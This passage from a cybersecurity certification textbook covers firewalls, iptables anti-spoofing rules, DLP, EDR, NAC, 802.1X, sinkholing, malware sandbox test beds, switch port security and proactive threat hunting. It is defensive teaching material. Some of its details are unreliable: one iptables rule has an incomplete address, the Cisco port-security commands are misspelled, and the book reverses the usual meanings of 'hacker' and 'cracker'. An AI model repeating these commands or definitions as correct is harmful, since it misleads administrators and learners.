prohibited applications (with all others allowed). It is
important to control the types of applications that users
can install on their computers. Some application types
can create support issues, and others can introduce
malware. It is possible to use Windows Group Policy to
restrict the installation of software on network
computers, as illustrated in Figure 12-1. Using Windows
Group Policy is only one option, and each organization
should select a technology to control application
installation and usage in the network.
Figure 12-1 Software Restrictions
Input Validation
Input validation is the process of checking all input for
things such as proper format and proper length. In many
cases, these validators use either the blacklisting of
characters or patterns or the whitelisting of characters or
patterns. Blacklisting looks for characters or patterns to
block. It can prevent legitimate requests. Whitelisting
looks for allowable characters or patterns and only
allows those. The length of the input should also be
checked and verified to prevent buffer overflows.
FIREWALL
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” discussed firewall logs and
Chapter 8, “Security Solutions for Infrastructure
Management,” discussed the various architectures used
in firewalls; at this point we need to look a little more
closely at firewall types and their placement for effective
operation. Firewalls can be software programs that are
installed over server or client operating systems or
appliances that have their own operating system. In
either case, the job of a firewall is to inspect and control
the type of traffic allowed.
NextGen Firewalls
Next-generation firewalls (NGFWs) are a category
of devices that attempt to address traffic inspection and
application awareness shortcomings of a traditional
stateful firewall, without hampering the performance.
Although unified threat management (UTM) devices also
attempt to address these issues, they tend to use separate
internal engines to perform individual security functions.
This means a packet may be examined several times by
different engines to determine whether it should be
allowed into the network.
NGFWs are application aware, which means they can
distinguish between specific applications instead of
allowing all traffic coming in via typical web ports.
Moreover, they examine packets only once, during the
deep packet inspection phase (which is required to detect
malware and anomalies). The following are some of the
features provided by NGFWs:
• Nondisruptive inline configuration (which has
little impact on network performance)
• Standard first-generation firewall capabilities,
such as network address translation (NAT),
stateful protocol inspection (SPI), and virtual
private networking
• Integrated signature-based IPS engine
• Application awareness, full stack visibility, and
granular control
• Ability to incorporate information from outside
the firewall, such as directory-based policy,
blacklists, and whitelists
• Upgrade path to include future information feeds
and security threats and SSL/TLS decryption to
enable identifying undesirable encrypted
applications
An NGFW can be placed inline or out-of-path. Out-ofpath means that a gateway redirects traffic to the NGFW,
while inline placement causes all traffic to flow through
the device. Figure 12-2 shows the two placement options
for NGFWs.
Figure 12-2 Placement of an NGFW
Table 12-2 lists the advantages and disadvantages of
NGFWs.
Table 12-2 Advantages and Disadvantages of
NGFWs
Host-Based Firewalls
A host-based firewall resides on a single host and is
designed to protect that host only. Many operating
systems today come with host-based (or personal)
firewalls. Many commercial host-based firewalls are
designed to focus attention on a particular type of traffic
or to protect a certain application.
On Linux-based systems, a common host-based firewall
is iptables, which replaces a previous package called
ipchains. It has the ability to accept or drop packets. You
create firewall rules much as you create an access list on
a router. The following is an example of a rule set:
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j
DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j
DROP
iptables -A INPUT -i eth1 -s 172. -j DROP
This rule set blocks all incoming traffic sourced from
either the 192.168.0.0/24 network or the 10.0.0.0/8
network. Both of these are private IP address ranges. It is
quite common to block incoming traffic from the
Internet that has a private IP address as its source, as
this usually indicates that IP spoofing is occurring. In
general, the following IP address ranges should be
blocked as traffic sourced from these ranges is highly
likely to be spoofed:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
224.0.0.0/4
240.0.0.0/5
127.0.0.0/8
The 224.0.0.0/4 range covers multicast traffic, and the
127.0.0.0/8 range covers traffic from a loopback IP
address. You may also want to include the APIPA
169.254.0.0 range as well, as it is the range in which
some computers give themselves IP addresses when the
DHCP server cannot be reached. On a Microsoft
computer, you can use Windows Defender to block these
ranges.
Table 12-3 lists the pros and cons of the various types of
firewalls.
Table 12-3 Pros and Cons of Firewall Types
Note
Other firewalls and associated network architecture approaches were covered
in Chapter 8.
INTRUSION PREVENTION
SYSTEM (IPS) RULES
As you learned earlier, some IPSs can be rule-based.
Chapter 3, “Vulnerability Management Activities,” and
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” covered these IPSs in more detail.
Chapter 11 covered rule writing in more detail.
DATA LOSS PREVENTION
(DLP)
Data loss prevention (DLP) software attempts to
prevent data leakage. It does this by maintaining
awareness of actions that can and cannot be taken with
respect to a document. For example, DLP software might
allow printing of a document but only at the company
office. It might also disallow sending the document
through e-mail. DLP software uses ingress and egress
filters to identify sensitive data that is leaving the
organization and can prevent such leakage. Another
scenario might be the release of product plans that
should be available only to the Sales group. You could set
the following policy for that document:
• It cannot be e-mailed to anyone other than Sales
group members.
• It cannot be printed.
• It cannot be copied.
There are two locations where you can implement this
policy:
• Network DLP: Installed at network egress points
near the perimeter, network DLP analyzes
network traffic.
• Endpoint DLP: Endpoint DLP runs on end-user
workstations or servers in the organization.
You can use both precise and imprecise methods to
determine what is sensitive:
• Precise methods: These methods involve
content registration and trigger almost zero false-
positive incidents.
• Imprecise methods: These methods can
include keywords, lexicons, regular expressions,
extended regular expressions, metadata tags,
Bayesian analysis, and statistical analysis.
The value of a DLP system resides in the level of
precision with which it can locate and prevent the
leakage of sensitive data.
ENDPOINT DETECTION AND
RESPONSE (EDR)
Endpoint detection and response (EDR) is a
proactive endpoint security approach designed to
supplement existing defenses. This advanced endpoint
approach shifts security from a reactive threat approach
to one that can detect and prevent threats before they
reach the organization. It focuses on three essential
elements for effective threat prevention: automation,
adaptability, and continuous monitoring.
The following are some examples of EDR products:
• FireEye Endpoint Security
• Carbon Black CB Response
• Guidance Software EnCase Endpoint Security
• Cybereason Total Enterprise Protection
• Symantec Endpoint Protection
• RSA NetWitness Endpoint
The advantage of EDR systems is that they provide
continuous monitoring. The disadvantage is that the
software’s use of resources could impact performance of
the device.
NETWORK ACCESS
CONTROL (NAC)
Network access control (NAC) is a service that goes
beyond authentication of the user and includes
examination of the state of the computer the user is
introducing to the network when making a remoteaccess or VPN connection to the network.
The Cisco world calls these services Network Admission
Control (NAC), and the Microsoft world calls them
Network Access Protection (NAP). Regardless of the
term used, the goals of the features are the same: to
examine all devices requesting network access for
malware, missing security updates, and any other
security issues the devices could potentially introduce to
the network.
Figure 12-3 shows the steps that occur in Microsoft NAP.
The health state of the device requesting access is
collected and sent to the Network Policy Server (NPS),
where the state is compared to requirements. If
requirements are met, access is granted.
Figure 12-3 NAC
The limitations of using NAC and NAP are as follows:
• They work well for company-managed computers
but less well for guests.
• They tend to react only to known threats and not
to new threats.
• The return on investment is still unproven.
• Some implementations involve confusing
configuration.
Access decisions can be of the following types:
• Time based: A user might be allowed to connect
to the network only during specific times of day.
• Rule based: A user might have his access
controlled by a rule such as “all devices must have
the latest antivirus patches installed.”
• Role based: A user may derive her network
access privileges from a role she has been
assigned, typically through addition to a specific
security group.
• Location based: A user might have one set of
access rights when connected from another office
and another set when connected from the
Internet.
Quarantine/Remediation
If you examine step 5 in the process shown in Figure 123, you see that a device that fails examination is placed in
a restricted network until it can be remediated. A
remediation server addresses the problems discovered
on the device. It may remove the malware, install
missing operating system updates, or update virus
definitions. When the remediation process is complete,
the device is granted full access to the network.
Agent-Based vs. Agentless NAC
NAC can be deployed with or without agents on devices.
An agent is software used to control and interact with a
device. Agentless NAC is the easiest to deploy but offers
less control and fewer inspection capabilities. Agentbased NAC can perform deep inspection and remediation
at the expense of additional software on the endpoint.
Both agent-based and agentless NAC can be used to
mitigate the following issues:
• Malware
• Missing OS patches
• Missing anti-malware updates
802.1X
Another form of network access control is 802.1X
Extensible Authentication Protocol (EAP). 802.1X is a
standard that defines a framework for centralized port
based authentication. It can be applied to both wireless
and wired networks and uses three components:
• Supplicant: The user or device requesting access
to the network
• Authenticator: The device through which the
supplicant is attempting to access the network
• Authentication server: The centralized device
that performs authentication
The role of the authenticator can be performed by a wide
variety of network access devices, including remoteaccess servers (both dial-up and VPN), switches, and
wireless access points. The role of the authentication
server can be performed by a Remote Authentication
Dial-in User Service (RADIUS) or Terminal Access
Controller Access Control System Plus (TACACS+)
server. The authenticator requests credentials from the
supplicant and, upon receipt of those credentials, relays
them to the authentication server, where they are
validated. Upon successful verification, the authenticator
is notified to open the port for the supplicant to allow
network access. Figure 12-4 illustrates this process.
Figure 12-4 802.1X Architecture
While RADIUS and TACACS+ perform the same roles,
they have different characteristics. These differences
must be taken into consideration when choosing a
method. Keep in mind also that while RADIUS is a
standard, TACACS+ is Cisco proprietary. Table 12-4
compares them.
Table 12-4 RADIUS vs. TACACS+
Among the issues 802.1X port-based authentication can
help mitigate are the following:
• Network DoS attacks
• Device spoofing (because it authenticates the user,
not the device
SINKHOLING
A sinkhole is a router designed to accept and analyze
attack traffic. Sinkholes can be used to do the following:
• Draw traffic away from a target
• Monitor worm traffic
• Monitor other malicious traffic
During an attack, a sinkhole router can be quickly
configured to announce a route to the target’s IP address
that leads to a network or an alternate device where the
attack can be safely studied. Moreover, sinkholes can
also be used to prevent a compromised host from
communicating back to the attacker. Finally, they can be
used to prevent a worm-infected system from infecting
other systems. Sinkholes can be used to mitigate the
following issues:
• Worms
• Compromised devices communicating with
command and control (C&C) servers
• External attacks targeted at a single device inside
the network
MALWARE SIGNATURES
While placing malware in a sandbox or isolation area for
study is a safe way of reverse engineering and eventually
disarming the malware, the best defense is to identify
and remove malware when it enters the network before it
infects the devices.
To do this, network security devices such as SIEM, IPS,
IDS, and firewall systems must be able to recognize the
malware when it is still contained in network packets
before it reaches devices. This requires identifying a
malware signature. This could be a filename or it could
be some series of characters that can be tied uniquely to
the malware.
You learned about signature-based IPS/IDS systems
earlier. You may remember that these systems and rulebased systems both rely on rules that instruct the
security device to be on the lookout for certain character
strings in a packet.
Development/Rule Writing
One of the keys to successful signature matching and
therefore successful malware prevention is proper rule
writing, which is in the development realm. Just as
automation is driving network technicians to learn basic
development theory and rule writing, so is malware
signature identification. Rule creation does not always
rely on the name of the malicious file. It also can be
based on behavior that is dangerous in and of itself.
Examples of rules or behavior that can indicate that a
system is infected by malware are as follows:
• A system process that drops various malware
executables (e.g., Dropper, a kind of Trojan that
has been designed to “install” some sort of
malware)
• A system process that reaches out to random, and
often foreign, IP addresses/domains
• Repeated attempts to monitor or modify key
system settings such as registry keys
SANDBOXING
Chapter 11 briefly introduced sandboxing. You can use a
sandbox to run a possibly malicious program in a safe
environment so that it doesn’t infect the local system.
By using sandboxing tools, you can execute malware
executable files without allowing the files to interact with
the local system. Some sandboxing tools also allow you
to analyze the characteristics of an executable. This is not
possible with some malware because it is specifically
written to do different things if it detects that it’s being
executed in a sandbox.
In many cases, sandboxing tools operate by sending a file
to a special server that analyzes the file and sends you a
report on it. Sometimes this is a free service, but in many
instances it is not. Some examples of these services
include the following:
• Sandboxie
• Akana
• Binary Guard True Bare Metal
• BitBlaze Malware Analysis Service
• Comodo Automated Analysis System and Valkyrie
• Deepviz Malware Analyzer
• Detux Sandbox (Linux binaries)
Another option for studying malware is to set up a
“sheep dip” computer. This is a system that has been
isolated from the other systems and is used for analyzing
suspect files and messages for malware. You can take
measures such as the following on a sheep dip system:
• Install port monitors to discover ports used by the
malware.
• Install file monitors to discover what changes may
be made to files.
• Install network monitors to identify what
communications the malware may attempt.
• Install one or more antivirus programs to perform
malware analysis.
Often these sheep dip systems are combined with
antivirus sensor systems to which malicious traffic is
reflected for analysis. The safest way to perform reverse
engineering and malware analysis is to prepare a test
bed. Doing so involves the following steps:
Step 1. Install virtualization software on the host.
Step 2. Create a VM and install a guest operating
system on the VM.
Step 3. Isolate the system from the network by
ensuring that the NIC is set to “host” only
mode.
Step 4. Disable shared folders and enable guest
isolation on the VM.
Step 5. Copy the malware to the guest operating
system.
Also, you need isolated network services for the VM,
such as DNS. It may also be beneficial to install multiple
operating systems in both patched and unpatched
configurations. Finally, you can make use of
virtualization snapshots and reimaging tools to wipe and
rebuild machines quickly. Once the test bed is set up, you
also need to install a number of other tools to use on the
isolated VM, including the following:
• Imaging tools: You need these tools to take
images for forensics and prosecution procedures.
Examples include SafeBack Version 2.0 and Linux
dd.
• File/data analysis tools: You need these tools
to perform static analysis of potential malware
files. Examples include PeStudio and PEframe.
• Registry/configuration tools: You need these
tools to help identify infected settings in the
registry and to identify the last-saved settings.
Examples include Microsoft’s Sysinternals
Autoruns and Silent Runners.vbs.
• Sandbox tools: You need these tools for manual
malware analysis in a safe environment.
• Log analyzers: You need these tools to extract
log files. Examples include AWStats and Apache
Log Viewer.
• Network capture tools: You need these tools to
understand how the malware uses the network.
Examples include Wireshark and Omnipeek.
While the use of virtual machines to investigate the
effects of malware is quite common, you should know
that some well-written malware can break out of a VM
relatively easily, making this approach problematic.
PORT SECURITY
Port security applies to ports on a switch or wireless
home router, and because it relies on monitoring the
MAC addresses of the devices attached to the switch
ports, it is considered to be Layer 2 security. While
disabling any ports that are not in use is always a good
idea, port security goes a step further and allows you to
keep a port enabled for legitimate devices while
preventing its use by illegitimate devices. You can apply
two types of restrictions to a switch port:
• Restrict the specific MAC addresses allowed to
send on the port.
• Restrict the total number of different MAC
addresses allowed to send on the port.
By specifying which specific MAC addresses are allowed
to send on a port, you can prevent unknown devices from
connecting to the switch port. Port security is applied at
the interface level. The interface must be configured as
an access port, so first you ensure that it is by executing
the following command:
Switch(config)# int fa0/1
Switch(config-if)# switchport mode access
In order for port security to function, you must enable
the feature. To enable it on a switchport, use the
following command at the interface configuration
prompt:
Switch(config-if)# switchport port security
Limiting MAC Addresses
Now you need to define the maximum number of MAC
addresses allowed on the port. In many cases today, IP
phones and computers share a switchport (the computer
plugs into the phone, and the phone plugs into the
switch), so here you want to allow a maximum of two:
Switch(config-if)# switchport port security
maximum 2
Next, you define the two allowed MAC addresses, in this
case, aaaa.aaaa.aaaa and bbbb.bbbb.bbbb:
Switch(config-if)# switchport port security
mac-address aaaa.aaaa.aaaa
Switch(config-if)# switchport port security
mac-address bbbb.bbbb.bbbb
Finally, you set an action for the switch to take if there is
a violation. By default, the action is to shut down the
port. You can also set it to restrict, which doesn’t shut
down the port but prevents the violating device from
sending any data. In this case, set it to restrict:
Switch(config-if)# switchport port security
violation restrict
Now you have secured the port to allow only the two
MAC addresses required by the legitimate user: one for
his phone and the other for his computer. Now you just
need to gather all the MAC addresses for all the phones
and computers, and you can lock down all the ports. Boy,
that’s a lot of work! In the next section, you’ll see that
there is an easier way.
Implementing Sticky MAC
Sticky MAC is a feature that allows a switch to learn
the MAC addresses of the devices currently connected to
the port and convert them to secure MAC addresses (the
only MAC addresses allowed to send on the port). All you
need to do is specify the keyword sticky in the command
where you designate the MAC addresses, and you’re
done. You still define the maximum number, and Sticky
MAC converts up to that number of addresses to secure
MAC addresses. Therefore, you can secure all ports by
only specifying the number allowed on each port and
specifying the sticky command in the port security
mac-address command. To secure a single port,
execute the following code:
Switch(config-if)# port security
Switch(config-if)# port security maximum 2
Switch(config-if)# port security mac-address
sticky
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 12-5 lists a reference of these key topics and the
page numbers on which each is found.
Table 12-5 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
permissions
rights
whitelisting
blacklisting
firewalls
next-generation firewalls (NGFWs)
host-based firewall
data loss prevention (DLP)
endpoint detection and response (EDR)
network access control (NAC)
802.1X
supplicant
authenticator
authentication server
sinkhole
port security
sticky MAC
REVIEW QUESTIONS
1. Granting someone the ability to reset passwords is
the assignment of a(n) ________.
2. List at least one disadvantage of packet filtering
firewalls.
3. Match the following terms with their definitions.
4. List at least two advantages of circuit-level proxies.
5. ___________________ is installed at network
egress points near the perimeter, to prevent data
exfiltration.
6. Match the following terms with their definitions.
7. List at least two disadvantages of RADIUS.
8. _______________ is a system that has been
isolated from the other systems and is used for
analyzing suspect files and messages for malware.
9. Match the flowing terms with their definitions.
10. List at least two measures that should be taken with
sheep dip systems.
Chapter 13. The
Importance of Proactive
Threat Hunting
This chapter covers the following topics related
to Objective 3.3 (Explain the importance of
proactive threat hunting) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Establishing a hypothesis: Discusses the
importance of this first step in threat hunting
• Profiling threat actors and activities: Covers
the process and kits application
• Threat hunting tactics: Describes hunting
techniques, including executable process analysis
• Reducing the attack surface area: Identifies
what constitutes the attack surface
• Bundling critical assets: Discusses the
reasoning behind this technique
• Attack vectors: Defines various attack vectors
• Integrated intelligence: Describes a technology
that addresses the need for shared intelligence
• Improving detection capabilities: Identifies
methods for improving detection
Threat hunting is a security approach that places
emphasis on actively searching for threats rather than
sitting back and waiting to react. It is sometimes referred
to as offensive in nature rather than defensive. This
chapter explores threat hunting and details what it
involves.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these eight self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 13-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 13-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the
scientific method?
a. Ask a question.
b. Conduct an experiment.
c. Make a conclusion.
d. Establish a hypothesis.
2. The U.S. Federal Bureau of Investigation (FBI) has
identified all but which of the following categories
of threat actors?
a. Hacktivists
b. Organized crime
c. State sponsors
d. Terrorist groups
3. Which of the following might identify a device that
has been compromised with malware?
a. Executable process analysis
b. Regression analysis
c. Risk management
d. Polyinstantiation
4. Which of the following allows you prevent any
changes to the device configuration, even by users
who formerly had the right to configure the device?
a. Configuration lockdown
b. System hardening
c. NAC
d. DNSSec
5. Which of the following is a measure of how freely
data can be handled?
a. Transparency
b. Sensitivity
c. Value
d. Quality
6. Which metric included in the CVSS Attack Vector
metric group means that the attacker can cause the
vulnerability from any network?
a. B
b. N
c. L
d. A
7. Which of the following focuses on merging
cybersecurity and physical security to aid
governments in dealing with emerging threats?
a. OWASP
b. NIST
c. IIC
d. PDA
8. In which step of Deming’s Plan–Do–Check–Act
cycle are the results of the implementation
analyzed to determine whether it made a
difference?
a. Plan
b. Do
c. Check
d. Act
FOUNDATION TOPICS
ESTABLISHING A
HYPOTHESIS
The first phase of proactive threat hunting is to establish
a hypothesis about the aims and nature of a potential
attack, similar to establishing a hypothesis when
following the scientific method, shown in Figure 13-1.
When security incidents are occurring, and even when
they are not occurring at the current time, security
professionals must anticipate attacks and establish a
hypothesis regarding the attack aims and method as
soon as possible. As you may already know from the
scientific method, making an executed guess about the
aims and nature of an attack is the first step. Then you
conduct experiments (or gather more network data) to
either prove or disprove the hypothesis. Then the process
starts again with a new hypothesis if the old one has been
disproved.
Figure 13-1 Scientific Method
For example, if an attacker is probing your network for
unknown reasons, you might follow the method in this
way:
1. Why is he doing this, what is his aim?
2. He is trying to perform a port scan.
3. Monitor and capture the traffic he sends to the
network.
4. Look for the presence of packets that have been
crafted by the hacker compared to those that are
the result of the normal TCP three-way handshake.
5. These packet types are not present; therefore, his
intent is not to port scan.
At this point another hypothesis will be suggested and
the process begins again.
PROFILING THREAT ACTORS
AND ACTIVITIES
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or
absent ACL is a threat actor. Keep in mind, though, that
threat actors can discover and/or exploit
vulnerabilities. Not all threat actors will actually exploit
an identified vulnerability. While you learned about basic
threat actors in Chapter 1, “The Importance of Threat
Data and Intelligence,” the U.S. Federal Bureau of
Investigation (FBI) has identified three categories of
threat actors:
• Organized crime groups primarily threatening the
financial services sector and expanding the scope
of their attacks
• State sponsors or advanced persistent threats
(APTs), usually foreign governments, interested in
pilfering data, including intellectual property and
research and development data from major
manufacturers, government agencies, and defense
contractors
• Terrorist groups that want to impact countries by
using the Internet and other networks to disrupt
or harm the viability of a society by damaging its
critical infrastructure
While there are other, less organized groups out there,
law enforcement considers these three groups to be the
primary threat actors. However, organizations should
not totally disregard the threats of any threat actors that
fall outside these three categories. Lone actors or smaller
groups that use hacking as a means to discover and
exploit any discovered vulnerability can cause damage
just like the larger, more organized groups.
Hacker and cracker are two terms that are often used
interchangeably in media but do not actually have the
same meaning. Hackers are individuals who attempt to
break into secure systems to obtain knowledge about the
systems and possibly use that knowledge to carry out
pranks or commit crimes. Crackers, on the other hand,
are individuals who attempt to break into secure systems
without using the knowledge gained for any nefarious
purposes. Hacktivists are the latest new group to crop
up. They are activists for a cause, such as animal rights,
that use hacking as a means to get their message out and
affect the businesses that they feel are detrimental to
their cause.
In the security world, the terms white hat, gray hat, and
black hat are more easily understood and less often
confused than the terms hackers and crackers. A white
hat does not have any malicious intent. A black hat has
malicious intent. A gray hat is somewhere between the
other two. A gray hat may, for example, break into a
system, notify the administrator of the security hole, and
offer to fix the security issues for a fee. Threat actors use
a variety of techniques to gather the information
required to gain a foothold.
THREAT HUNTING TACTICS
Security analysts use various techniques in the process of
anticipating and identifying threats. Some of these
methods revolve around network surveillance and others
involve examining the behaviors of individual systems.
Hunt Teaming
Hunt teaming is a new approach to security that is
offensive in nature rather than defensive, which has been
the common approach of security teams in the past.
Hunt teams work together to detect, identify, and
understand advanced and determined threat actors.
Hunt teaming is covered in Chapter 8, “Security
Solutions for Infrastructure Management.”
Threat Model
A threat model is a conceptual design that attempts to
provide a framework on which to implement security
efforts. Many models have been created. Let’s say, for
example, that you have an online banking application
and need to assess the points at which the application
faces threats. Figure 13-2 shows how a threat model in
the form of a data flow diagram might be created using
the Open Web Application Security Project (OWASP)
approach to identify where the trust boundaries are
located.
Figure 13-2 OWASP Threat Model
Threat modeling tools go beyond these simple data flow
diagrams. The following are some recent tools:
• Threat Modeling Tool (formerly SDL Threat
Modeling Tool) identifies threats based on the
STRIDE threat classification scheme.
• ThreatModeler identifies threats based on a
customizable comprehensive threat library and is
intended for collaborative use across all
organizational stakeholders.
• IriusRisk offers both community and
commercial versions of a tool that focuses on the
creation and maintenance of a live threat model
through the entire software development life cycle
(SDLC). It connects with several different tools to
empower automation.
• securiCAD focuses on threat modeling of IT
infrastructures using a computer-based design
(CAD) approach where assets are automatically or
manually placed on a drawing pane.
• SD Elements is a software security requirements
management platform that includes automated
threat modeling capabilities.
Executable Process Analysis
When the processor is very busy with very little or
nothing running to generate the activity, it could be a
sign that the processor is working on behalf of malicious
software. This is one of the key reasons any compromise
is typically accompanied by a drop in performance.
Executable process analysis allows you to
determine this. While Task Manager in Windows is
designed to help with this, it has some limitations. For
one, when you are attempting to use it, you are typically
already in a resource crunch, and it takes a bit to open.
Then when it does open, the CPU has settled back down,
and you have no way of knowing what caused it.
By using Task Manager, you can determine what process
is causing a bottleneck at the CPU. For example, Figure
13-3 shows that in Task Manager, you can click the
Processes tab and then click the CPU column to sort the
processes with the top CPU users at the top. In Figure 133, the top user is Task Manager, which makes sense since
it was just opened.
Figure 13-3 Task Manager
A better tool to use is Sysinternals, which is a free
download at https://docs.microsoft.com/sysinternals/.
The specific part of this tool you need is Process
Explorer, which enables you to see in the Notification
area the top CPU offender, without requiring you to open
Task Manager. Moreover, Process Explorer enables you
to look at the graph that appears in Task Manager and
identify what caused spikes in the past, which is not
possible with Task Manager alone. In Figure 13-4, you
can see that Process Explorer breaks down each process
into its subprocesses.
Figure 13-4 Process Explorer
An example of using Task Manager for threat hunting is
to proactively look at times and dates when processor
usage is high during times when system usage is typically
low, indicating a malicious process at work.
Memory Consumption
Another key indicator of a compromised host is
increased memory consumption. Many times it is an
indication that additional programs have been loaded
into RAM so they can be processed. Then once they are
loaded, they use RAM in the process of executing their
tasks, whatever they may be. You can monitor memory
consumption by using the same approach you use for
CPU consumption. If memory usage cannot be
accounted for, you should investigate it. (Review what
you learned about buffer overflows, which are attacks
that may display symptoms of increased memory
consumption.)
REDUCING THE ATTACK
SURFACE AREA
Reducing the attack surface area means limiting the
features and functions that are available to an attacker.
For example, if I lock all doors to the facility with the
exception of one, I have reduced the attack surface.
Another term for reducing the attack surface area is
system hardening because it involves ensuring that
all systems have been hardened to the extent that is
possible and still provide functionality.
System Hardening
Another of the ongoing goals of operations security is to
ensure that all systems have been hardened to the extent
that is possible and still provide functionality. System
hardening can be accomplished both on physical and on
logical bases. From a logical perspective:
• Remove unnecessary applications.
• Disable unnecessary services.
• Block unrequired ports.
• Tightly control the connecting of external storage
devices and media, if allowed at all.
System hardening is also done at the physical layer.
Physical security was covered in Chapter 7 but some
examples include
• Fences around the facility
• Locks on the doors
• Disabled USB ports
• Display filters
• Clean desk policy
Configuration Lockdown
Configuration lockdown (sometimes also called
system lockdown) is a setting that can be implemented
on devices including servers, routers, switches, firewalls,
and virtual hosts. You set it on a device after that device
is correctly configured, and it prevents any changes to
the configuration, even by users who formerly had the
right to configure the device. This setting helps support
change control.
Full tests for functionality of all services and applications
should be performed prior to implementing this setting.
Many products that provide this functionality offer a test
mode, in which you can log any problems the current
configuration causes without allowing the problems to
completely manifest on the network. This allows you to
identify and correct any problems prior to implementing
full lockdown.
BUNDLING CRITICAL
ASSETS
While organizations should strive to protect all assets, in
the cybersecurity world we tend to focus on what is at
risk in the cyber world, which is our data. Bundling these
critical digital assets helps to organize them so that
security controls can be applied more cleanly with fewer
possible human errors. Before bundling can be done,
data must be classified.
Data Classification Policy
Data should be classified based on its value to the
organization, its sensitivity to disclosure, and its
criticality. Assigning a value to data allows an
organization to determine the resources that should be
used to protect the data. Resources that are used to
protect data include personnel resources, monetary
resources, and access control resources. Classifying data
allows you to apply different protective measures. Data
classification is critical to all systems to protect the
confidentiality, integrity, and availability (CIA) of data.
After data is classified, the data can be segmented based
on the level of protection it needs. The classification
levels ensure that data is handled and protected in the
most cost-effective manner possible. An organization
should determine the classification levels it uses based
on the needs of the organization. A number of
commercial business and military and government
information classifications are commonly used. The
information life cycle should also be based on the
classification of the data. Organizations are required to
retain certain information, particularly financial data,
based on local, state, or government laws and
regulations.
Sensitivity and Criticality
Sensitivity is a measure of how freely data can be
handled. Some data requires special care and handling,
especially when inappropriate handling could result in
penalties, identity theft, financial loss, invasion of
privacy, or unauthorized access by an individual or many
individuals. Some data is also subject to regulation by
state or federal laws and requires notification in the
event of a disclosure. Data is assigned a level of
sensitivity based on who should have access to it and
how much harm would be done if it were disclosed.
Criticality is a measure of the importance of the data.
Data considered sensitive may not necessarily be
considered critical. Assigning a level of criticality to a
particular data set must take into consideration the
answer to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered critical when it is essential to the
organization’s business. When essential data is not
available, even for a brief period of time, or its integrity is
questionable, the organization is unable to function.
Data is considered required but not critical when it is
important to the organization but organizational
operations can continue for a predetermined period of
time even if the data is not available. Data is considered
nonessential if the organization is able to operate
without it during extended periods of time.
Commercial Business Classifications
Commercial businesses usually classify data using four
main classification levels, listed here from highest
sensitivity level to lowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Data that is confidential includes trade secrets,
intellectual data, application programming code, and
other data that could seriously affect the organization if
unauthorized disclosure occurred. Data at this level
would only be available to personnel in the organization
whose work relates to the data’s subject. Access to
confidential data usually requires authorization for each
access. In the United States, confidential data is exempt
from disclosure under the Freedom of Information Act.
In most cases, the only way for external entities to have
authorized access to confidential data is as follows:
• After signing a confidentiality agreement
• When complying with a court order
• As part of a government project or contract
procurement agreement
Data that is private includes any information related to
personnel, including human resources records, medical
records, and salary information, that is used only within
the organization. Data that is sensitive includes
organizational financial information and requires extra
measures to ensure its CIA and accuracy. Public data is
data whose disclosure would not cause a negative impact
on the organization.
Military and Government
Classifications
Military and government entities usually classify data
using five main classification levels, listed here from
highest sensitivity level to lowest:
1. Top secret: Data that is top secret includes
weapon blueprints, technology specifications, spy
satellite information, and other military
information that could gravely damage national
security if disclosed.
2. Secret: Data that is secret includes deployment
plans, missile placement, and other information
that could seriously damage national security if
disclosed.
3. Confidential: Data that is confidential includes
patents, trade secrets, and other information that
could seriously affect the government if
unauthorized disclosure occurred.
4. Sensitive but unclassified: Data that is
sensitive but unclassified includes medical or other
personal data that might not cause serious damage
to national security but could cause citizens to
question the reputation of the government.
5. Unclassified: Military and government
information that does not fall into any of the other
four categories is considered unclassified and
usually has to be granted to the public based on the
Freedom of Information Act.
Distribution of Critical Assets
One strategy that can help support resiliency is to ensure
that critical assets are not all located in the same physical
location. Collocating critical assets leaves your
organization open to the kind of nightmare that occurred
in 2017 at the Atlanta airport. When a fire took out the
main and backup power systems (which were located
together), the busiest airport in the world went dark for
over 12 hours. Distribution of critical assets certainly
enhances resilience.
ATTACK VECTORS
An attack vector is a segment of the communication
path that an attack uses to access a vulnerability. Each
attack vector can be thought of as comprising a source of
malicious content, a potentially vulnerable processor of
that malicious content, and the nature of the malicious
content itself.
Recall from Chapter 2, “Utilizing Threat Intelligence to
Support Organizational Security,” that the Common
Vulnerability Scoring System (CVSS) has as part of its
Base metric group a metric called Attack Vector (AV). AV
describes how the attacker would exploit the
vulnerability and has four possible values:
• L: Stands for Local and means that the attacker
must have physical or logical access to the affected
system.
• A: Stands for Adjacent network and means that
the attacker must be on the local network.
• N: Stands for Network and means that the
attacker can cause the vulnerability from any
network.
• P: Stands for Physical and requires the attacker to
physically touch or manipulate the vulnerable
component .
Analysts can use the accumulated CVSS information
regarding attacks to match current characteristics of
indicators of compromise to common attacks.
INTEGRATED INTELLIGENCE
Integrated intelligence refers to the consideration
and analysis of intelligence data from a perspective that
combines multiple data sources and attempts to make
inferences based on this data integration. Many vendors
of security software and appliances often tout the
intelligence integration capabilities of their products.
SIEM systems are a good example, as described in
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
The Integrated Intelligence Center (IIC) is a unit at the
Center for Internet Security (CIS) that focuses on
merging cybersecurity and physical security to aid
governments in dealing with emerging threats. IIC
attempts to create predictive models using the multiple
data sources at its disposal.
